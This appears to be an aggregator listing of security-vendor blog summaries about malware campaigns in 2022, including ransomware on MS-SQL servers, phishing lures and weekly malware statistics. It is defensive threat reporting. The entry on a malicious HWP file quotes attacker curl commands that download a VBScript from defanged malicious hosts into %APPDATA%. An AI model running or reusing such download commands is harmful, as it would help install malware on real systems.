What's new around the internet


Date (GMT) | Title | Description | Tags

2022-10-12 04:24:38 | GlobeImposter Ransomware Being Distributed in Korea | The ASEC analysis team has recently identified through internal monitoring that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed. GlobeImposter has also been mentioned in AhnLab TIP's quarterly statistics, specifically in the '2022 1st and 2nd Quarter Statistical Report on Malware Targeting MS-SQL,' and in the 2nd quarter GlobeImposter accounted for 52.6% of ransomware targeting MS-SQL. It is still appearing in the soon-to-be-released 3rd quarter statistics. This ransomware... | Ransomware, Malware

2022-10-12 04:18:45 | (Déjà vu) ASEC Weekly Malware Statistics (September 26th, 2022 – October 2nd, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday). For the main category, downloader ranked top with 38.2%, followed by info-stealer with 35.1%, ransomware with 14.7%, backdoor with 11.6%, and CoinMiner with 0.4%. Top 1 – BeamWinHTTP: BeamWinHTTP is a downloader malware that ranked top with 16.7%. BeamWinHTTP is distributed via malware disguised... | Ransomware, Malware

2022-10-12 04:01:25 | Qakbot Being Distributed as ISO Files Instead of Excel Macro | There has been a recent increase in the distribution of malware through ISO files. Among such malware, Qakbot, an online banking malware, has changed its distribution method from Excel 4.0 Macro to ISO files. The ASEC blog has introduced cases of ISO file usage not only for Qakbot but also for AsyncRAT, IcedID, and BumbleBee malware. As such, cases of using ISO files for malware distribution are increasing. The phishing mail that... | Malware

2022-09-28 04:06:47 | (Déjà vu) ASEC Weekly Malware Statistics (September 19th, 2022 – September 25th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from September 19th, 2022 (Monday) to September 25th, 2022 (Sunday). For the main category, info-stealer ranked top with 51.3%, followed by backdoor with 21.1%, downloader with 17.2%, and ransomware with 10.3%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 20.7%. It is an info-stealer that leaks user credentials saved... | Ransomware, Malware

2022-09-28 03:39:14 | (Déjà vu) ASEC Weekly Malware Statistics (September 12th, 2022 – September 18th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from September 12th, 2022 (Monday) to September 18th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.5%, followed by downloader with 27.5%, backdoor with 19.9%, ransomware with 8.2%, and banking malware with 2.9%. Top 1 – AgentTesla: AgentTesla is an infostealer that ranked first place with 18.1%. It is an info-stealer that... | Ransomware, Malware

2022-09-23 00:14:52 | FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers | The ASEC analysis team is constantly monitoring malware distributed to vulnerable MS-SQL servers. The team has recently discovered the distribution of FARGO ransomware targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware families targeting vulnerable MS-SQL servers. In the past, it was also called Mallox because it used the file extension .mallox. – [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers... | Ransomware, Malware

2022-09-21 00:28:20 | (Déjà vu) ASEC Weekly Malware Statistics (September 5th, 2022 – September 11th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from September 5th, 2022 (Monday) to September 11th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.1%, followed by downloader with 32.7%, backdoor with 12.5%, and ransomware with 7.7%. Top 1 – GuLoader: GuLoader, which ranked first place with 21.1%, is a downloader malware that downloads additional malware and runs it. It... | Ransomware, Malware

2022-09-14 00:40:00 | Phishing Websites Disguised as Korean Groupware Login Website Being Distributed | The ASEC analysis team has been running a honeypot to collect various malware strains being distributed both in Korea and overseas. The honeypot also collects phishing emails and recently caught one targeting Korean users, which has been distributed continuously to Korean email accounts only since August. The phishing website the email redirects to is disguised as a login page for a Korean groupware site, and over 2,500 cases of access to the website were confirmed. Thus users must... | Malware

2022-09-14 00:30:00 | (Déjà vu) ASEC Weekly Malware Statistics (August 29th, 2022 – September 4th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from August 29th, 2022 (Monday) to September 4th, 2022 (Sunday). For the main category, info-stealer ranked top with 45.9%, followed by downloader with 28.1%, backdoor with 18.5%, ransomware with 6.2%, and CoinMiner and banking malware with 0.7% each. Top 1 – GuLoader: GuLoader, which ranked first place with 22.6%, is a downloader malware that... | Ransomware, Malware

2022-09-01 09:49:18 | (Déjà vu) ASEC Weekly Malware Statistics (August 22nd, 2022 – August 28th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from August 22nd, 2022 (Monday) to August 28th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.0%, followed by backdoor with 31.8%, downloader with 21.4%, and ransomware with 5.8%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 23.7%. It is an info-stealer that leaks user credentials... | Ransomware, Malware

2022-09-01 09:47:35 | (Déjà vu) ASEC Weekly Malware Statistics (August 15th, 2022 – August 21st, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from August 15th, 2022 (Monday) to August 21st, 2022 (Sunday). For the main category, info-stealer ranked top with 57.8%, followed by backdoor with 24.2%, downloader with 13.7%, ransomware with 3.7%, and CoinMiner with 0.6%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 38.5%. It is an info-stealer that leaks... | Ransomware, Malware

2022-09-01 01:51:53 | Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) | The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp and cmd /c cd > %appdata%\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\vbtemp. Both commands save the script in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript code that performs features such as registering to task... | Malware

2022-08-31 23:26:41 | RAT Tool Disguised as Solution File (*.sln) Being Distributed on GitHub | The ASEC analysis team has recently discovered the distribution of a RAT tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing source code on GitHub titled "Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022". The file composition looks normal, but the solution file (*.sln) is actually a RAT tool. It is through methods like this that the malware distributor lures users into running the RAT tool by... | Malware, Tool

2022-08-24 05:02:44 | AsyncRAT Being Distributed in Fileless Form | The ASEC analysis team has recently discovered that malicious AsyncRAT code is being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker. The compressed file distributed through phishing emails contains an HTML file, and executing this file will... | Malware

2022-08-18 00:26:46 | (Déjà vu) ASEC Weekly Malware Statistics (August 8th, 2022 – August 14th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from August 8th, 2022 (Monday) to August 14th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.9%, followed by backdoor with 38.4%, downloader with 16.8%, ransomware with 2.2%, and CoinMiner with 0.6%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 23.1%. It is an info-stealer that leaks... | Ransomware, Malware

2022-08-17 01:43:10 | (Déjà vu) ASEC Weekly Malware Statistics (August 1st, 2022 – August 7th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from August 1st, 2022 (Monday) to August 7th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.4%, followed by backdoor with 22.6%, downloader with 20.0%, ransomware with 6.8%, banking with 2.6%, and CoinMiner with 0.5%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 25.8%. It is... | Ransomware, Malware

2022-08-08 02:21:33 | Monero CoinMiner Being Distributed via Webhards | Webhards are the main platforms that attackers targeting Korean users exploit to distribute malware. The ASEC analysis team has been monitoring malware types distributed through webhards and has uploaded multiple blog posts about them in the past. Generally, attackers distribute malware together with illegal programs such as adult games and cracked versions of games. Those who use webhards as a distribution path typically install RAT-type malware such as njRAT, UdpRAT, and DDoS IRC Bot. The team has recently discovered the... | Malware

2022-08-03 02:20:00 | (Déjà vu) ASEC Weekly Malware Statistics (July 25th, 2022 – July 31st, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from July 25th, 2022 (Monday) to July 31st, 2022 (Sunday). For the main category, info-stealer ranked top with 38.6%, followed by backdoor with 38.1%, and downloader with 23.3%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 23.8%. It is an info-stealer that leaks user credentials saved in web... | Malware

2022-07-28 05:48:00 | (Déjà vu) ASEC Weekly Malware Statistics (July 18th, 2022 – July 24th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from July 18th, 2022 (Monday) to July 24th, 2022 (Sunday). For the main category, info-stealer ranked top with 44.7%, followed by backdoor with 40.3%, downloader with 14.5%, and ransomware with 0.6%. Top 1 – Agent Tesla: AgentTesla is an infostealer that ranked first place with 27.0%. It is an info-stealer that leaks user credentials... | Ransomware, Malware

2022-07-28 05:27:47 | AppleSeed Being Distributed to Maintenance Company of Military Bases | The ASEC analysis team has recently discovered a case of AppleSeed being distributed to a maintenance company of military bases. AppleSeed is a backdoor malware mainly used by the Kimsuky group and is actively being distributed to multiple attack targets as of late. In this case, the malware was distributed with a file named after a military base: 20220713_**** base_installation planned dateV004_*** edited_6.xls. AppleSeed was distributed as an Excel file (XLS) protected with a password to... | Malware

2022-07-25 05:26:50 | IcedID Being Distributed Through ISO Files | The ASEC analysis team has introduced various types of malware distributed through ISO files, and recently discovered the distribution of IcedID (a module-type banking malware) through ISO files. There were two methods of distributing the malware. The first used the same method employed by the Bumblebee malware discussed in the previous post. The second is similar to the first but adds script files and the cmd command. The first type... | Malware

2022-07-25 05:17:47 | (Déjà vu) ASEC Weekly Malware Statistics (July 11th, 2022 – July 17th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from July 11th, 2022 (Monday) to July 17th, 2022 (Sunday). For the main category, info-stealer ranked top with 52.2%, followed by backdoor with 26.8%, downloader with 19.7%, banking with 0.6%, and ransomware with 0.6%. Top 1 – AgentTesla: AgentTesla is an infostealer that ranked first place with 29.9%. It is an info-stealer that leaks... | Ransomware, Malware

2022-07-21 00:17:28 | (Déjà vu) ASEC Weekly Malware Statistics (July 4th, 2022 – July 10th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from July 4th, 2022 (Monday) to July 10th, 2022 (Sunday). For the main category, info-stealer ranked top with 43.9%, followed by downloader with 27.2%, backdoor with 21.1%, banking with 6.1%, ransomware with 1.1%, and coinminer with 0.6%. Top 1 – AgentTesla: AgentTesla is an infostealer that ranked first place with 27.2%. It is an... | Ransomware, Malware

2022-07-21 00:10:40 | Malware Being Distributed by Disguising Itself as Icon of V3 Lite | The ASEC analysis team has discovered the distribution of malware disguised with a V3 Lite icon and packed with a .NET packer. The attacker likely created an icon almost identical to that of V3 Lite to trick users; AveMaria RAT and AgentTesla were discovered using this method during the last month. As shown in Figure 1, the icon looks almost identical to the actual V3 Lite icon. AveMaria is a RAT (Remote Administration Tool) malware with... | Malware

2022-07-21 00:06:36 | Amadey Bot Being Distributed Through SmokeLoader | Amadey Bot, a malware first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker. Like other malware strains, it has been sold on illegal forums and used by various attackers. The ASEC analysis team previously revealed cases where Amadey was used in attacks, in an ASEC blog post from 2019 (English version unavailable). Amadey was mainly used to install ransomware by the attackers behind GandCrab, or to install FlawedAmmyy by... | Ransomware, Malware

2022-07-11 23:47:10 | GuLoader Disguised as Estimate Requests Being Distributed via Phishing Email | GuLoader has ranked in the Top 5 malware keywords of ASEC Weekly Malware Statistics again, for the first time in two years. It is a downloader malware that can download additional malware, and got its name because Google Drive is frequently used as its download URL. The ASEC analysis team has found that this malware made up the largest share of downloader malware distributed during the 2nd quarter of this year (see figure below). Recently discovered case... | Malware

2022-07-11 00:47:31 | Meterpreter Distributed to Vulnerable Server of Korean Medical Institution | While monitoring malware strains distributed to vulnerable servers, the ASEC analysis team discovered an attack case against a PACS (Picture Archiving and Communication System) server used by Korean medical institutions. PACS is a system for digitally managing and transferring patients' medical images so that they can be checked and interpreted without being restricted by time and place; it is thus used by many hospitals. As there are multiple PACS vendors, each medical institution may use a different PACS system.... | Malware

2022-07-11 00:36:11 | AppleSeed Disguised as Purchase Order and Request Form Being Distributed | The ASEC analysis team has recently discovered the distribution of AppleSeed disguised as purchase orders and request forms. AppleSeed is a backdoor malware mainly used by the Kimsuky group. It stays resident in the system and performs malicious behaviors by receiving commands from attackers. The malware is currently being distributed under the following filenames: Purchase order-**-2022****-001-National Tax Service additionally implementing security sensors in 5 regional tax offices_***.jse; Request form(general manager ***).jse. A JSE (JScript Encoded File) file consists of JavaScript, and... | Malware

2022-07-07 01:27:25 | (Déjà vu) ASEC Weekly Malware Statistics (June 27th, 2022 – July 3rd, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from June 27th, 2022 (Monday) to July 3rd, 2022 (Sunday). For the main category, info-stealer ranked top with 48.0%, followed by banking malware with 26.5%, RAT (Remote Administration Tool) with 12.5%, downloader with 8.2%, ransomware with 2.2%, coinminer with 1.8%, and backdoor with 0.7%. Top 1 – AgentTesla: AgentTesla is an infostealer that ranked... | Ransomware, Malware

2022-07-07 01:13:00 | AsyncRAT Being Distributed to Vulnerable MySQL Servers | The Shadowserver Foundation has recently released a report showing that about 3.6 million MySQL servers are exposed to the outside. Along with MS-SQL, MySQL is one of the main database servers providing the ability to manage large amounts of data in a corporate or user environment. MS-SQL is mainly used in Windows environments, while MySQL is still widely used in Linux environments. The ASEC analysis team is constantly monitoring malware distributed to vulnerable database servers. In... | Malware

2022-07-01 05:27:57 | Case of Attack Exploiting AnyDesk Remote Tool (Cobalt Strike and Meterpreter) | MS-SQL servers are among the main attack targets on Windows systems. Attackers scan for poorly managed, vulnerable MS-SQL servers and install malware after gaining control. Malware strains installed by attackers include CoinMiner, ransomware, backdoors, etc., and vary depending on the purpose of the attack. Most backdoor strains are remote control types such as Remcos RAT and Gh0st RAT, but there are also penetration testing tools used to take over companies' internal systems, such as Cobalt Strike and Meterpreter. The attack... | Malware, Tool

2022-06-29 05:06:20 | (Déjà vu) ASEC Weekly Malware Statistics (June 20th, 2022 – June 26th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from June 20th, 2022 (Monday) to June 26th, 2022 (Sunday). For the main category, info-stealer ranked top with 53.8%, followed by downloader with 25.1%, backdoor with 14.8%, banking malware with 4.9%, and ransomware with 1.3%. Top 1 – AgentTesla: AgentTesla is an infostealer that ranked first place with 25.6%. It is an info-stealer that... | Ransomware, Malware

2022-06-28 04:44:03 | ASEC Weekly Malware Statistics (June 13th, 2022 – June 19th, 2022) | The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from June 13th, 2022 (Monday) to June 19th, 2022 (Sunday). For the main category, info-stealer ranked top with 63.8%, followed by backdoor with 17.8%, downloader with 8.9%, banking malware with 7.5%, and ransomware with 1.9%. Top 1 – AgentTesla: AgentTesla is an infostealer that ranked first place with 29.1%. It is an info-stealer that... | Ransomware, Malware

2022-06-28 04:42:22 | New Info-stealer Disguised as Crack Being Distributed | The ASEC analysis team has previously published posts about various malware types distributed disguised as software cracks and installers; CryptBot, RedLine, and Vidar are major examples. Recently, the single-file type of RedLine has disappeared (it is still being distributed as a dropper type) and a new infostealer is being actively distributed instead. Its distribution got into full swing starting from May 20th, and it is globally categorized as "Recordbreaker Stealer." Some analyses see it as... | Malware
Last update at: 2024-06-29 06:07:30